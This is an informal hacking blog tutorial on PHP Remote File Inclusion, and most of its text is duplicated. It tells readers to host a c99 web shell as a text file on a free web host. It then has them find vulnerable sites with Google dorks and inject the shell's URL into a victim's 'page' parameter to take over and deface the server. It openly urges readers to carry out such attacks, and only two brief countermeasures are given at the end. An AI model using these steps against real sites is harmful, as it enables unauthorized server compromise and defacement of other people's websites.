RFI stands for Remote File Inclusion, and it allows the attacker to upload a custom coded/malicious file on a website or server using a script. The vulnerability exploit the poor validation checks in websites and can eventually lead to code execution on server or code execution on website (XSS attack using javascript). This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of tutorial, i suppose you will know what it is all about and may be able to deploy an attack or two.
RFI is a common vulnerability, and trust me all website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and do almost anything (including gagging them out or beg..well that's an exaggeration but I guess you get the idea :P ) . What makes it more dangerous is that you only need to have your common sense and basic knowledge of PHP to execute this one, some BASH might come handy as most of servers today are hosted on Linux..
Before starting this tutorial, I would like to tell you about a piece of code called as shell. There are many shells available . Lets consider a shell known as c99 shell. Download it from Internet.
Now signup for a account on any free web hosting site . Say 110mb.com. Now sign into your account,go to Filemanager, upload some files and then upload c99 shell here. Now just log out and visit the URL of shell you uploaded.
http://yourname.110mb.com/shell.php
and you would find that you can manage all your directories and files without logging in your account,that is without entering your password anywhere.
Note:Your account might be suspended after uploading such shells.
How to perform attack ?
Step 1. Upload a shell in text format on your web hosting site. That is just copy the code of shell and save it as text file and upload it. Note down the complete path of your shell.
Step 2. Search for the vulnerable site using google dorks. like:-
inurl:index.php?id=
inurl:index.php?page=
You can also use automated tools for the same.
Step3. Lets say you got any site like
http://www.victim.com/index.php?page=anything
Replace this URL by http://www.victim.com/index.php?page=http://yoursite.com/yourshell.txt?
Your shell might have uploaded on server if the victim's site is vulnerable. Now you can do any thing with victim's site or may be even with other sites running on same webserver by simply accessing your shell.
Possible Countermeasures :
1. Strongly validate the user's input.
2. Disable allow_url_fopen and allow_url_include in php.ini .
This is just a basic of RFI & WEB DEFACEMENT ....
In My Upcoming Articles I'll post some advance methods of Defacement..
So Stay in Touch & Keep Reading..
Post Your Comments & Feedbacks...@@@@
Before starting this tutorial, I would like to tell you about a piece of code called as shell. There are many shells available . Lets consider a shell known as c99 shell. Download it from Internet.
Now signup for a account on any free web hosting site . Say 110mb.com. Now sign into your account,go to Filemanager, upload some files and then upload c99 shell here. Now just log out and visit the URL of shell you uploaded.
http://yourname.110mb.com/shell.php
and you would find that you can manage all your directories and files without logging in your account,that is without entering your password anywhere.
Note:Your account might be suspended after uploading such shells.
How to perform attack ?
Step 1. Upload a shell in text format on your web hosting site. That is just copy the code of shell and save it as text file and upload it. Note down the complete path of your shell.
Step 2. Search for the vulnerable site using google dorks. like:-
inurl:index.php?id=
inurl:index.php?page=
You can also use automated tools for the same.
Step3. Lets say you got any site like
http://www.victim.com/index.php?page=anything
Replace this URL by http://www.victim.com/index.php?page=http://yoursite.com/yourshell.txt?
Your shell might have uploaded on server if the victim's site is vulnerable. Now you can do any thing with victim's site or may be even with other sites running on same webserver by simply accessing your shell.
Possible Countermeasures :
1. Strongly validate the user's input.
2. Disable allow_url_fopen and allow_url_include in php.ini .
This is just a basic of RFI & WEB DEFACEMENT ....
In My Upcoming Articles I'll post some advance methods of Defacement..
So Stay in Touch & Keep Reading..
Post Your Comments & Feedbacks...@@@@